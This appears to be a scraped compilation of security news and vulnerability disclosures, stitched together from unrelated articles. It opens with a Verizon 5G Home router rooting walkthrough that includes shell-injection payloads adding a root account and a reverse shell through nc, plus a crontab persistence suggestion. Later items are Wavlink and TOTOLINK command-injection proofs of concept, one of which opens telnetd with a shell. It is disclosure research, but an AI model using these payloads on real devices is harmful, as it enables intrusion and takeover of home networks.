On Verizon 5G Home LVSKIHP InDoorUnit (IDU) 3.4.66.162 and OutDoorUnit (ODU) 3.33.101.0 devices, the CRTC and ODU RPC endpoints rely on a static account username/password for access control. This password can be generated via a binary included in the firmware, after ascertaining the MAC address of the IDU's base Ethernet interface, and adding the string DEVICE_MANUFACTURER='Wistron_NeWeb_Corp.' to /etc/device_info to replicate the host environment. This occurs in /etc/init.d/wnc_factoryssidkeypwd (IDU).

**Introduction**

The Verizon 5G LVSKIHP is an all-in-one integrated Modem and Router that provides access to the Verizon Wireless 5G Wireless for Home Internet service. The consumer side of the device provides basic settings for configuration of the Wi-Fi, Firewall, Parental Controls, etc. This device can also be put into Bridge Mode, hat tip to Tifan.net's research:

https://tifan.net/blog/2021/04/01/enable-bridge-mode-on-verizon-5g-home-router-lv55-lvskisp/

**Credit**

*   Matthew Lichtenberger
*   Shea Polansky

**CVEs**

*   CVE-2022-28369 - IDU 3.4.66.162 does not validate URI passed to enable\_ssh function, allowing arbitrary file upload/execution.
*   CVE-2022-28370 - ODU 3.33.101.0 does not validate firmware cryptographically when uploaded to the crtc\_fw\_upgrade function.
*   CVE-2022-28371 - IDU 3.4.66.162 & ODU 3.33.101.0 utilize static firmware-embedded certificate for authentication to JSON listeners.
*   CVE-2022-28372 - IDU 3.4.66.162 & ODU 3.33.101.0 do not validate the URI passed to JSON listener for firmware update.
*   CVE-2022-28373 - IDU 3.4.66.162 does not properly sanitize user-controlled parameters within the crtcreadpartition function. Shell metacharacters can be injected to achieve remote code execution as the root user.
*   CVE-2022-28374 - ODU 3.33.101.0 does not properly sanitize user-controlled parameters within the DMACC URLs on the Engineering page. Shell metacharacters can be injected to achieve remote code execution as the root user.
*   CVE-2022-28375 - ODU 3.33.101.0 does not properly sanitize user-controlled parameters within the crtcswitchsimprofile function. Shell metacharacters can be injected to achieve remote code execution as the root user.
*   CVE-2022-28376 - IDU 3.4.66.162 & ODU 3.33.101.0 pre-generate a static password for the "verizon" engineering account.
*   CVE-2022-28377 - IDU 3.4.66.162 & ODU 3.33.101.0 pre-generate a static password for the "jrpc" account.

**Walkthrough****Rooting the OutDoor Unit (ODU)**

When the device is in Bridge Mode, the Consumer side ceases to provide any functionality (although the backend links can still be accessed).  It also exposes an interface at 10.0.0.1 that requires a username and password to access. 

The consumer side allows one to export the logs of the device, by navigating to the System Settings,  clicking the arrow for History Log, and clicking "Export Log".  When this function is triggered, it creates a .tar.gz of the entire Log directory and provides it to the user (under subdirectory /mnt/wnc/logs).  Several of the logs are instructive towards identifying further targets for investigation. The most useful log for this purpose was OMADM.log, which logged the device receiving a firmware update. 

Downloading and binwalking this file shows that it is an unencrypted Squashfs Filesystem.  Mounting it, there are several files of interest, but the main focus was on the "sdxprairie-sysfs.ubi" file. Since it's a UBI file system, Linux will not mount it as a loop device,  as UBI filesystems are block-based NAND, so they need to be extracted or mounted to a fake NAND: 

    sudo modprobe nandsim first_id_byte=0x2c second_id_byte=0xac third_id_byte=0x90 fourth_id_byte=0x26
    sudo nandwrite /dev/mtd0 sdxprairie-sysfs.ubi
    sudo modprobe ubi mtd=/dev/mtd0,4096
    sudo mount -t ubifs -o ro /dev/ubi0_0 test
    

The filesystem resembles a basic Linux ARM environment; however, several folders are empty, and it is likely they have mount points on the device and don't exist in the firmware image. However, exploring /etc/initscripts finds several interesting shell scripts for operating the device.  One of particular note is the function within /etc/initscripts/wnc\_keygen titled "create\_engineer\_pwd". 

This function reveals that the engineering username is "verizon" and the engineering password is the first and last 7 characters of the SHA256 hash of the Serial Number concatenated with the Model Number of the device. It is possible to log in on the interface at 10.0.0.1 with this information. 

As Verizon likely did not expect casual users to access this portal, it seemed likely that less effort went into security hardening this side of the web portal. Initial efforts focused on the "Enable Telnet" functionality provided on the Settings page, but the above function provides the "verizon" user with a shell of "/bin/false", so this effort was halted. However, further down on the Settings page there are several arbitrary text fields, including ones labelled "DMACC1" through "DMACC3". 

Exploring further into the firmware image, the LuCI webserver controller was located at /usr/lib/lua/5.1/luci/. Digging into the /view/vz\_page/setting.htm file, the following line governs the text input. 

Grepping for dmacc3 within the luci folder, there is a reference to controller/admin/settings.lua. Opening that file up, this function appears to utilize text placed in that field with no sanitization. 

Thus, this field was injectable. When a line like '; reboot;# is placed at the end of a DMACC URL string, the device reboots. Several attempts were made, like attempting to utilize sed to change the /bin/false in /etc/passwd, invoking a reverse shell, and others, before a successful approach was identified. Since the device runs all binaries as root, it is possible to edit any file on the system. By appending a new user account to the /etc/passwd and /etc/shadow files, a user "tester" with the password "testtest" is created in the system:  

    '; echo 'tester:$6$npapnF1GfqtUSVWY$vA1CApnnjXxQiIXMl2JKhpnS0V.g0cTNx2HDGvxeURrhTMjjQsO2DN6ec6hLjAG2Ao2yZiPgE4GdbbgvuCBf9/:::::::' >> /etc/shadow; # 
    '; echo "tester:x:0:0:tester:/bin/ash" >> /etc/passwd; #
    

Once this is complete, and the "Telnet Enable" toggle is selected, no further barriers were encountered logging in with Telnet. As the tester account was configured with the UID of 0 and the GID of 0, no privilege escalation is required. 

This completes the rooting of the "ODU" component of the device, or "OutDoor Unit" aspect. Note that the /etc/shadow and /etc/passwd are not regenerated on reboot, so this is a persistent modification (until a new firmware is loaded into the device).

**Rooting the InDoor Unit (IDU)**

The other half of the device is the "IDU" or "InDoor Unit", which runs the consumer-side functionality of the router, at 10.0.0.2. Verizon appears to have spent time hardening this side... attempting to inject on many of the fields returns a warning saying "Due to security concerns, please do not use special characters, e.g. ()\[\];|'<>\`&="". Additionally, a JSON response of "invalid symbol" is returned, which suggests the check is performed server side. 

While watching the network traffic when navigating pages, several "encr\_get" queries were observed. These queries are encrypted with a public key the server provides, and are encrypted by a function in "wnc.js" that is as follows:

    params.args = JSON.stringify(params.args);
    if(cmd.api == CMD.ENCR_GET.api || cmd.api == CMD.ENCR_SET.api){
         //console.log(params.args);  // need remove
         const encrypt = new JSEncrypt();
         encrypt.setPublicKey(sessionStorage.pubkey);
         var encrypt_data = ""
         var end = 0;
         for(var i=0; end < (params.args.length+1); i++){
               end = ((i+1)*117) > (params.args.length+1) ? (params.args.length+1): ((i+1)*117)
               var str = params.args.slice(i*117, end);
               encrypt_data = encrypt_data + encrypt.encrypt(str) + "#";
         }  
         params.args = encodeURIComponent(encrypt_data);
    }
    

Putting a breakpoint before the params.args is encrypted,  the request is for \[{"ObjName":"Device.Users.User."}\] and that the response contains 4 JSON Objects, each titled "cpe-User-". 1 is "root", 2 is "jrpc", 3 is the consumer user "admin", and 4 is "verizon".  Going back to the login screen, there is a hidden field named "srp\_username" that holds the value of "admin".  Removing the type="hidden" property on that field and using the engineering password from above allows for login as the Verizon user,  but no further functionality was immediatley exposed when logged in.  Note that you can also breakpoint line 140 of cgi-bin/luci in the debugger, and in the console issue "username = encrypt.encrypt("verizon")" to perform the same mod. 

However, once the account was logged out again, it redirects to a new endpoint: /cgi-bin/luci/verizon/engineer. This time, the page title is "Engineer Sign In",  and using the same engineer password redirects to a new environment with new functionality.  A toggle allows the user to disable the Software Update (useful to 'hold' the device at a vulnerable version), run a speed test, edit the Wifi settings, and more. Additionally, none of these fields trigger the warning seen earlier. Like the engineer portal on the ODU, consumers are not expected to access this section, and thus fields trust any input provided.

As above, the next step was to explore the IDU's file system. Initially it seemed like any attack on the IDU was going to be blind, but a second review of the OMADM.log file during the update process revealed the following line. 

The WNC\_SIGNED\_LVSKIHP.32bit.nand.lab2.3.4.66.162.210520\_1031.bin file exists in the update firmware.  However, a different approach was required to extract this file system. The previous trick to mount the UBI against a nandsim wasn't working,  so instead the "ubi\_reader" tool from https://github.com/jrspruitt/ubi\_reader was used. First, we extract the UBI image with:

    dd if=WNC_SIGNED_LVSKIHP.32bit.nand.lab2.3.4.66.162.210520_1031.bin of=idu.ubi bs=1 skip=3328688
    

Then using the command "ubireader\_extract\_images idu.ubi" extracted three files into the directory "ubifs-root/idu.ubi", one of which was named "img-1221542750\_vol-ubi\_rootfs.ubifs". blkid identifies this as a squashfs image. Using:

    sudo unsquashfs ubifs-root/idu.ubi/img-1221542750_vol-ubi_rootfs.ubifs
    

The root filesystem for the IDU side is revealed.  Hunting through the file system, we find a configuration file for the lighttpd daemon, and it identifies an interface listening on port 48443, named "crtc".  Amazingly, it accepts a set of keys that are hardcoded into the firmware, in the same directory. Reviewing the /usr/lib/lua/luci/crtc.lua file, a function named "crtcreadpartition" was identified as not santizing its parameters. 

In order to get access to this function, we must first enable the crtcmode of the modem. To do so, we issue the following curl command:

    curl -m 10 -s -k https://10.0.0.2:48443/cgi-bin/luci/rpc/crtc --cacert ca.pem --cert server.pem -X POST -d '{"jsonrpc":"2.0","id":1,"method":"crtcmode","params":["enable"]}'
    

This command also benefits us in that it automatically enables telnet and USB on the ODU side.  An injection payload was crafted of the format:

    curl -m 10 -s -k https://10.0.0.2:48443/cgi-bin/luci/rpc/crtc --cacert ca.pem --cert server.pem -X POST -d '{"jsonrpc":"2.0","id":1,"method":"crtcreadpartition","params":["; <payload>;#"]}'. 
    

After a few different approaches were attempted, the mkfifo method of creating a reverse shell was identified as a successful approach. As the ODU had already been rooted, it seemed a good target for connecting back to, as it is trusted by the IDU and thus it was unlikely that firewall rules would interfere. The final payload was: 

    curl -m 10 -s -k https://10.0.0.2:48443/cgi-bin/luci/rpc/crtc --cacert ca.pem --cert server.pem -X POST -d '{"jsonrpc":"2.0","id":1,"method":"crtcreadpartition","params":["; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 11223 >/tmp/f ;#"]}'
    

And the command run on the ODU was:

Note that whoami does not exist on this system, but it is running as the root user. Persistence can be established through any of a myriad of ways. We suggest a reverse shell in the crontab file.

**Improvements**

Improvements can be seen in the codebases for both the InDoorUnit (IDU):  And in the OutDoorUnit (ODU): 

**Timeline**

*   2021-12-25 : Vulnerabilities discovered.
*   2021-12-29 : Verizon contacted.
*   2022-01-12 : No response from Verizon, report sent to manufacturer: Wistron NeWeb Corp.
*   2022-01-13 : Verizon acknowledged report.
*   2022-01-27 : Update requested.
*   2022-02-03 : Update requested. Verizon responds, no substantive update.
*   2022-02-15 : Modem receives firmware update 5.33.117.1. Still vulnerable to attack chain.
*   2022-02-23 : Verizon requested screenshots of exploits in action. Provided same day.
*   2022-02-26 : Notified Verizon that the Engineering password was now in the wild on a Reddit post. Verizon acknowledged 2/28/22.
*   2022-03-25 : Requested update, and informed that vulnerabilities were submitted to MITRE for CVE issuance.
*   2022-04-27 : Modem receives firmware downgrade back to 3.33.101.1. Requested update from Verizon.
*   2022-05-02 : Received CVEs for vulnerabilities. Provided to Verizon, as well as indication that report would be released July 1st. Verizon indicated end of May for remediation.
*   2022-06-01 : Update requested.
*   2022-06-14 : Modem receives firmware update 5.33.141.1. All vulnerabilities are patched.
*   2022-06-28 : Verizon provided confirmation from security team that all vulnerabilities have been resolved.
*   2022-07-01 : Public release.

CVE-2022-28377: SecWriteups/readme.md at main · JousterL/SecWriteups

Implemented protections on AWS credentials that were not properly protected.

**WDC Tracking Number:** WDC-22009  
**Published:** July 11, 2022

**Last Updated:** July 11, 2022

**Description**

My Cloud Home Firmware 8.7.0-107 is a major release containing updates to help improve the security of your My Cloud Home devices. Numerous changes were made to the operating system to comprehensively improve its security and to upgrade the user experience to support our latest technologies.

The base operating system has been upgraded from an Android based operating system to the Linux operating system to align with security and stability updates from Debian 10 “Buster”.

Additionally, the Linux kernel has been updated to 4.9.266.

Your My Cloud Home device will be automatically updated to reflect the latest firmware version.    

**Product Impact**

**Minimum Fix Version**

**Last Updated**

My Cloud Home

8.7.0-107

July 8, 2022

My Cloud Home Duo

8.7.0-107

July 8, 2022

For more information on the latest security updates, see the release notes.

**Advisory Summary**

A vulnerability in the Linux kernel’s cgroup\_release\_agent\_write was addressed that could lead to escalation of privileges and bypass namespace isolation unexpectedly.  

Addressed an issue in OpenSSL that would make it possible to trigger an infinite loop by crafting a certificate that has invalid elliptic curve parameters. Since certificate parsing takes place before the certificate signature verification process, this could lead to a denial-of-service attack.

**CVE Number:** CVE-2022-0778  

Addressed a memory copy vulnerability in the Linux Wi-Fi driver.  

Addressed a command injection attack that could allow a malicious attacker on the same LAN to carry out a DNS spoofing attack via an unsecured HTTP call. This was done by removing the affected code from the product.

**CVE Number:** CVE-2022-22991, CVE-2022-22994

Reported By: Martin Rakhmanov (@mrakhmanov) working with Trend Micro’s Zero Day Initiative  

A vulnerability was discovered within the parsing of extended attributes (EA) metadata when opening a file in smbd. This vulnerability can be exploited by unauthenticated users if they are allowed write access to file extended attributes. This vulnerability was addressed by removing the "fruit" VFS module from the list of configured VFS objects and by changing EA support configurations.

**CVE Number:** CVE-2021-44142

Reported By: Nguyen Hoang Thach (@hi\_im\_d4rkn3ss) and Billy Jheng Bing-Jhong (@st424204) working with Trend Micro’s Zero Day Initiative  

Addressed multiple FFmpeg vulnerabilities by updating the version to 7:4.1.8-0+deb10u1.

**CVE Number:** CVE-2020-20445, CVE-2020-20446, CVE-2020-20453, CVE-2020-21041, CVE-2020-22015, CVE-2020-22016, CVE-2020-22017, CVE-2020-22019, CVE-2020-22020, CVE-2020-22021, CVE-2020-22022, CVE-2020-22023, CVE-2020-22025, CVE-2020-22026, CVE-2020-22027, CVE-2020-22028, CVE-2020-22029, CVE-2020-22030, CVE-2020-22031, CVE-2020-22032, CVE-2020-22033, CVE-2020-22034, CVE-2020-22035, CVE-2020-22036, CVE-2020-22037, CVE-2020-22049, CVE-2020-22054, CVE-2020-35965, CVE-2021-38114, CVE-2021-38171, CVE-2021-38291  

Addressed multiple FFmpeg vulnerabilities by updating the version to 7:4.1.9-0+deb10u1.  

Implemented firmware signing to prevent malicious modifications to the firmware and verify the firmware’s authenticity and integrity.  

Transitioned to Go’s crypto/tls library for secure communications.  

Enabled several kernel hardening options to make exploits of kernel and userland security bugs more difficult to develop.  

Addressed a remote code execution vulnerability by resolving a command injection vulnerability and closing an AWS S3 bucket that potentially allowed an attacker to execute unsigned code on My Cloud Home devices. Implemented protections on AWS credentials that were not properly protected..

**CVE Number:** CVE-2022-22997, CVE-2022-22998

Western Digital would like to thank Viettel Cyber Security for reporting this issue.  

Addressed multiple libtiff null pointer dereference vulnerabilities by updating the version to 4.4.0.

**CVE Number:** CVE-2022-0562, CVE-2022-0561, CVE-2022-0865  

Addressed an improper input validation and out-of-bounds write vulnerability in TensorFlow which is an open-source platform for machine learning. An attacker could pass negative values to cause a segmentation fault-based denial-of-service attack. Certain components also did not validate input arguments which could also trigger a denial-of-service attack.

**CVE Number:** CVE-2022-29191, CVE-2022-29213, CVE-2022-29208

CVE-2022-22998: WDC-22009 My Cloud Home Firmware Version 8.7.0-107 | Western Digital

Improper access control vulnerability in updateLastConnectedClientInfo function of SemWifiApClient prior to SMR Jul-2022 Release 1 allows attacker to access wifi ap client mac address that connected.

CVE-2022-30750

By Deeba Ahmed
A cybersecurity researcher using the alias Kevin2600 has revealed how hackers can exploit a vulnerability to unlock Honda vehicles. According…
This is a post from HackRead.com Read the original post: Researcher Reveals How Hackers Can Remotely Unlock/Start Honda Cars

****A cybersecurity researcher using the alias Kevin2600 has revealed how hackers can exploit a vulnerability to unlock Honda vehicles.****

According to Kevin2600, associated with cybersecurity firm Star-V Lab, the vulnerability allows attackers to steal the code and unlock or even start Honda vehicles using basic hardware.

He dubbed the bug Rolling-PWN and published videos demonstrating the attack and a detailed technical report on the newly discovered vulnerability. The National Vulnerability Database called it a “Counter resynchronization attack” and assigned it CVE-2021-46145.

**Details of the Vulnerability**

Regarding it as a “serious vulnerability,” Kevin 2600 revealed identifying the bug in a “vulnerable version of the rolling codes mechanism,” which is used in most Honda cars. The researcher wrote that the vulnerability lets the attacker open the car door permanently and start the engine from a considerable distance.

Theoretically, it means every time the car’s owner uses the keyfob, it will dispatch a new code to open the car. The mechanism is devised to make it impossible to steal and reuse the code. However, the vulnerability lets the attacker roll back the codes and reuse an old code to open the car.  

**Attack Overview**

Kevin2600 explained in a technical report that the attack works when the attacker uses a software-defined radio, for example, HackRF, to capture the code the car’s owner uses for unlocking the vehicle.

The attacker would then replay it to reset the internal pseudo-random number generator or PRNG counter and unlock the car from as far as 98 feet or 30 meters distance. For this attack, hackers only need valid old keys, which they can retrieve by attaching a logging device to the vehicle to receive valid codes and replay them.

In his videos, the researcher demonstrated the efficacy of this attack by successfully unlocking various models of Honda vehicles using a device connected to a laptop. Of all the models Kevin2600 and his colleagues tested at a Honda dealership, ten used the rolling code mechanism and were found vulnerable to the attack.

Hence, researchers concluded that all Honda vehicle models manufactured between 2012 and 2022 are vulnerable. The list of impacted models provided by Kevin2600 includes the following:

*   Honda Fit 2022
*   Honda Civic 2012
*   Honda X-RV 2018
*   Honda VE-1 2022
*   Honda Civic 2022
*   Honda C-RV 2020
*   Honda Inspire 2021
*   Honda Accord 2020
*   Honda Breeze 2022
*   Honda Odyssey 2020

**Honda’s Response**

A Honda spokesperson stated that the vulnerability discovered by Kevin2600 is not new, and the company already knows about it. They want to treat it as “old news” and “move on to something current rather than creating a new round of people thinking this is a ‘new’ thing.”

However, the researcher claims the Honda spokesperson referred to a study conducted earlier this year that focused only on fixed codes and not on rolling codes. Kevin2600 explained that this is a concerning issue because the attack is hard to detect as there’s no way to identify if someone has exploited the flaw to start or unlock the car.

A recall, according to Kevin2600, is imminent to fix the issue, so owners may take their cars to the local dealership to update Keyfob firmware with a patch.

**More Vehicle Manufacturer Security News**

*   Personal data of over 50,000 Honda Connect App leaked
*   Honda hit by WannaCry ransomware attack; shuts down plant
*   Tesla cars can be remotely hacked using a drone, WIFI dongles
*   3rd-party flaws allowed a teen hacker to track location of Tesla cars
*   Multiple Internet-Connected BMW vehicles are vulnerable to getting hacked

Researcher Reveals How Hackers Can Remotely Unlock/Start Honda Cars

The US Federal Communications Commission says a man posing as a fake broadband service promised victims discounts on internet services and devices.

Traxler's scam lasted from May to August 2021, during which he "repeatedly engaged in conduct that violated the federal wire fraud statute and the Commission's rules," the FCC said. The proposed $220,210 forfeiture penalty is "the statutory maximum we can impose, and reflects the scope, duration, seriousness, and egregiousness of Cleo's apparent violations," according to the commission.

When Cleo applied to be in the EBB program, the FCC initially told the entity that its application would be "denied as it lacks sufficient information for approval." But Cleo subsequently gained FCC approval by offering documents including copies of two invoices "with customer-identifying information removed, which Cleo claimed was 'due to CPNI and privacy.'" Cleo also claimed to the FCC that it "had been providing high-speed wireless Internet" to 500 customers.

Dozens of Nearly Identical Complaints

The FCC said it reviewed 41 complaints about Cleo, all of which "focused on the same types of allegations. According to the complaints, consumers searched the list of participating EBB Program providers through individual states' Universal Service or EBB Program websites, the FCC website, or USAC's \[Universal Service Administrative Company\] website and followed links to Cleo's website. The complaints alleged that Cleo accepted payment for EBB Program discounted broadband services or connected devices from these consumers electronically, failed to send the ordered product or provide the requested services, and then failed to provide refunds."

The FCC interviewed eight of the consumers who filed complaints, who live in Alabama, Arizona, Colorado, Illinois, Massachusetts, New York, Washington state, and Wisconsin.

An Illinois woman ordered a laptop from Cleo for $50 using the Venmo payment service. The woman got no response when she contacted Cleo to report that she never received the laptop, the FCC said. She then "attempted to reach out to Cleo via social media (Facebook) and by telephone, but Cleo did not respond and blocked her both on Facebook and telephone," the FCC said.

A New York woman "ordered an EBB Program-discounted tablet, laptop, 'Wi-Fi box,' and hotspot service from Cleo's website on July 13, 2021, and arranged payment of $108.94 on the website through PayPal," the FCC said. This consumer "told Bureau staff that she e-mailed Cleo when she did not receive the devices she ordered and that Cleo staff were 'rude to her and told her they didn't have to provide service to her.' She said someone at Cleo told her to 'read the fine print.' She exchanged a few e-mails with Cleo until it ultimately stopped responding."

Other complainants similarly said that Cleo stopped responding to messages seeking information on the devices they never received. Some of the consumers were able to cancel payments made via credit card or PayPal.

"The eight consumers interviewed by the Bureau and other consumers who filed complaints with the FCC's Consumer Complaint Center all stated that Cleo did not deliver the EBB Program-supported services or devices they ordered, and the company refused to issue refunds. Some consumers stated in their complaints that Cleo claimed it would sue them when they asked for a refund," the FCC said.

Shady Terms of Service Forbade Refunds

The terms of service that Cleo cited when denying refunds said the company "does NOT nor will ever imply or agree upon a refund, credits nor any other refunds of service and monies to be returned to you."

"Cleo Communications operates a PREPAID Service. All services are sold as in \[sic\] and without warranty. Under NO circumstances does Cleo Communications represent any warranty nor provide a refund of any kind for services that are offered," the terms state, according to the FCC. The Cleo terms additionally said that "charge backs to us via any customer bank is breach of contract at any time and is subject to further legal action up to but not limited to small claims court actions for breach of contract in the amount of what is disputed, any and all legal fees, court fees, attorney fees, filing fees, interest at 9.9%, and a contract breach fee in the amount of $300.00."

Rude Responses: “You Will Be Taken to Court”

The FCC document detailed incidents in which Cleo responded to customers seeking refunds by threatening to sue or seek charges for harassment:

_As examples, on August 2, 2021, when a customer e-mailed requesting a refund, Cleo responded, "\[y\]our wish to hide behind PayPal instead of contacting us. We will not be issuing you a refund. We will not be allowing you to use your benefits as we have claimed them. And you will be taken to Court. Cleo Care."_

_On August 10, 2021, when another customer requested a refund, Cleo responded, "Refund denied. Please see the terms of service that outline your rights and our obligations and rights that will be imposed. Also your EBB has been claimed. You will not use our credit anywhere else and you will be issued an invoice and to collections. Cleo Collections." Cleo continued in a later e-mail with that customer by saying, "\[n\]ext time read before you order. As we will now no longer communicate. Any further e-mails will result in harassment charges in Ohio. Cleo Legal."_

_On August 12, 2021, Cleo stated to another customer, "\[w\]e are not ignoring you, nor are we charging you. You have requested a refund and refunds are not given and was informed of this and someone would decide of \[sic\] one would be issued or not. Please see- kyty.xyz/terms.html. Is what was sent to the FCC. With documents that you are and have not been ignored that your claims state \[sic\]. Cleo Legal Affairs._

_This story originally appeared on_ _Ars Technica__._

An ISP Scam Targeted Low-Income People Seeking Government Aid

Wavlink WL-WN575A3 RPT75A3.V4300.201217 was discovered to contain a command injection vulnerability via the function obtw. This vulnerability allows attackers to execute arbitrary commands via a crafted POST request.

**Information**

**Vendor of the products:**    WAVLINK

**Vendor's website:**    https://www.wavlink.com/en\_us

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:** Wavlink WL-WN575A3

**Affected firmware version:** RPT75A3.V4300.201217

**Firmware download address:** https://www.wavlink.com/en\_us/firmware/details/fac744bd61.html

**Overview**

Wavlink WL-WN575A3 RPT75A3.V4300.201217 has several command injection vulnerabilities detected at function obtw. Attackers can send POST request messages to /cgi-bin/wireless.cgi and inject evil commands into parameter CCK_1M or CCK_5M or OFDM_6M or OFDM_12M or HT20_MCS_0 or HT20_MCS_1_2 or HT40_MCS_0 or HT40_MCS_32 or HT40_MCS_1_2 to execute arbitrary commands.

**Show the product**

Wavlink WL-WN575A3 is a AC1200 Dual-band Wi-Fi Range Extender. The test version here is RPT75A3.V4300.201217.

**Vulnerability details**

The vulnerability is detected at /etc_ro/lighttpd/www/cgi-bin/wireless.cgi.

At first, from the _start entry enters, and then the ftext function is executed.

In the function ftext, we find that when bypassing the check of wlan_conf and the content of page field is obtw, we can execute the obtw function.

In the function obtw, the program uses function web_get to obtain the content of parameter obtw_enable , CCK_1M , CCK_5M , OFDM_6M , OFDM_12M , HT20_MCS_0 , HT20_MCS_1_2 , HT40_MCS_0 , HT40_MCS_32 and HT40_MCS_1_2 which are sent by POST request. Then, when obtw_enable != 0, the content of other parameters are formatted into a string passed as an argument to the function do_system which can execute system commands.

Above all, attackers can send POST request messages to /cgi-bin/wireless.cgi and let wlan_conf=2860 & page=obtw and inject evil commands into parameter CCK_1M or CCK_5M or OFDM_6M or OFDM_12M or HT20_MCS_0 or HT20_MCS_1_2 or HT40_MCS_0 or HT40_MCS_32 or HT40_MCS_1_2 to execute arbitrary commands.

**POC**

Send the following to the URL http://wifi.wavlink.com/cgi-bin/wireless.cgi by POST request.

    wlan_conf=2860
    &page=obtw
    &obtw_enable=1
    &CCK_1M=;echo 1 >> /etc_ro/lighttpd/www/data.html;
    &CCK_5M=;echo 2 >> /etc_ro/lighttpd/www/data.html;
    &OFDM_6M=;echo 3 >> /etc_ro/lighttpd/www/data.html;
    &OFDM_12M=;echo 4 >> /etc_ro/lighttpd/www/data.html;
    &HT20_MCS_0=;echo 5 >> /etc_ro/lighttpd/www/data.html;
    &HT20_MCS_1_2=;echo 6 >> /etc_ro/lighttpd/www/data.html;
    &HT40_MCS_0=;echo 7 >> /etc_ro/lighttpd/www/data.html;
    &HT40_MCS_32=;echo 8 >> /etc_ro/lighttpd/www/data.html;
    &HT40_MCS_1_2=;echo 9 >> /etc_ro/lighttpd/www/data.html;
    

**Review Vulnerabilities**

At first, we confirm that the page /data.html does not exist.

Then, we use HackBar to send the POC above. **We inject commands that output 1 to 9 in turn into each parameter.**

Finally, we detect that the page /data.html has been created and the number 1 to 9 are displayed on the page.

So far, we have verified that **the all above nine parameters can be vulnerability points injected by arbitrary commands**.

CVE-2022-34592: CVE/README.md at main · winmt/CVE

TOTOLINK EX300_V2 V4.0.3c.7484 was discovered to contain a command injection vulnerability via the langType parameter in the setLanguageCfg function. This vulnerability is exploitable via a crafted MQTT data packet.

**Information**

**Vendor of the products:**    TOTOLINK

**Vendor's website:**    http://www.totolink.cn

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:**    TOTOLINK EX300\_V2

**Affected firmware version:** V4.0.3c.7484

**Firmware download address:** http://www.totolink.cn/data/upload/20210720/b351052836a4fc7e1575dc513afc02b1.zip

**Overview**

TOTOLINK EX300_V2 V4.0.3c.7484 has a command injection vulnerability detected at function setLanguageCfg. Attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.

**Show the product**

TOTOLINK EX300_V2 is a Wi-Fi repeater made in China.

**Vulnerability details**

The vulnerability is detected at /bin/cste_modules/global.so.

In the function setLanguageCfg, the content obtained by program through parameter langType given by MQTT data packet is passed to variable Var. Then, the variable Var is formatted into v9 through the function sprintf without any check. Finally, v9 is passed as an argument to the function CsteSystem which can execute system commands.

Above all, attackers can send a MQTT data packet and inject evil commands into parameter langType to execute arbitrary commands.

**POC**

import paho.mqtt.client as mqtt

client \= mqtt.Client()
client.connect("192.168.0.254", 1883, 60)
client.publish("totolink/router/setLanguageCfg", '{"langType": "$(telnetd -l /bin/sh)"}')

**Get shell**

At first, we run the above script to exploit the vulnerability.

Then, we scan ports and dectect that the port 23 which represents Telnet service has been opened.

Finally, we telnet into the Wi-Fi repeater through port 23 and control it successfully.

CVE-2022-32449: CVE/README.md at main · winmt/CVE

By Deeba Ahmed
Israeli Mobile Cybersecurity Startup Cirotta has launched smartphone cases that the company claims to provide complete protection while…
This is a post from HackRead.com Read the original post: Mobile Cybersecurity Firm Cirotta Launches Anti-Hacking Phone Cases

****Israeli Mobile Cybersecurity** **Startup Cirotta has launched smartphone cases that the company claims to provide complete protection while allowing full operation of devices.****

Tel Aviv, Israel-based startup Cirotta has introduced a ground-breaking method to prevent mobile phone hacking and data privacy breaches. The company explained in a press release that it has successfully converted smartphone cases into full-fledged electronic security devices.

**A Novel Idea**

Undoubtedly, turning phone cases into electronic security gadgets is a unique idea to create a security barrier between threat actors and smartphone data. According to Cirotta, these phone cases offer foolproof security to the phone without impacting the device’s normal operations.

**Target Consumers**

The case price starts at $200, which is quite expensive for a phone case. However, it is worth investing in protecting your data. The cases’ target audiences currently include security, government, and military institutions/officials, high-profile executives, and VIPs.

For your information, Cirotta specializes in creating advanced anti-surveillance technologies for smartphones.

**Anti-Hacking Phone Case Detailed Overview**

According to Cirotta, these anti-hacking phone cases are backed up by six patents. These are available in numerous configurations to meet the diverse needs of smartphone users.

Moreover, these cases are non-device or network-specific and function independently. Another great feature is that the cases are well-designed and aesthetically pleasing. Regarding their capabilities, Cirotta explained that the case blocks camera lenses to prevent threat actors from accessing cameras and spying on the user.

Furthermore, these prevent undesired conversation tracking/recording, thwart operating system hacking or data sweeping when the phone is turned on, and use highly advanced security algorithms to evade the phone’s active noise filtering mechanism.

The cases can also prevent hackers from abusing microphones remotely and block location tracking by overriding the GPS data. That’s not all; the anti-hacking cases can nullify monitoring of Wi-Fi and Bluetooth connections and offset Near-field communication (NFC).

**Two Models Available in Anti-Hacking Cases**

The cases are available in two models- Athena and Universal. Athena is compatible with a broad range of high-end smartphone models, including the iPhone 12 Pro, iPhone 13 Pro, Samsung Galaxy S22, and upcoming models in these series.

Currently, Athena Silver is available that can block the device’s camera and mic. Athena Gold will be launched soon with the capability of securing the device’s Wi-Fi, GPS, and Bluetooth connectivity, among other features.

Conversely, the Universal model is compatible with almost all smartphone models. You can choose between Universal Gold, Silver, and Bronze model. Bronze can only block the phone’s camera, Silver can block the camera and mic, and Gold can block all transmissible data points such as camera, mic, GPS, Wi-Fi, and Bluetooth. This model will be available from August 2022.

**More Anti-Surveillance & Anti-Hacking Tools**

*   Anti-surveillance mask enables you to pass as someone else
*   Meet IRpair & Phantom; powerful anti-facial recognition glasses
*   These Anti-Surveillance Tools Will Protect Activists and Their Privacy
*   New anti-facial recognition glasses protect users’ privacy from CCTV
*   SnoopSnitch — An App That Detects Govt’s Stingray Mobile Trackers

Mobile Cybersecurity Firm Cirotta Launches Anti-Hacking Phone Cases

Here's how I did it and how you can protect your company against such physical/digital hybrid attacks.

Most companies have strategies in place to educate employees about network security. But there has been a lot less awareness and education on how to reduce "phygital" risks — that is, physical devices that launch digital attacks against a company's computer networks.

Another name for these phygital attacks is "warshipping." Essentially, a malicious hacker creates an Internet-enabled device — for example, a miniature computer — and sends it through physical mail in an attempt to compromise a company's computer network. What's more, because so many employees have yet to return to their physical offices post-lockdown, these devices can easily sit for months unattended in unopened mail on desks and in mailrooms, gathering data and exploiting vulnerabilities in a company's network.

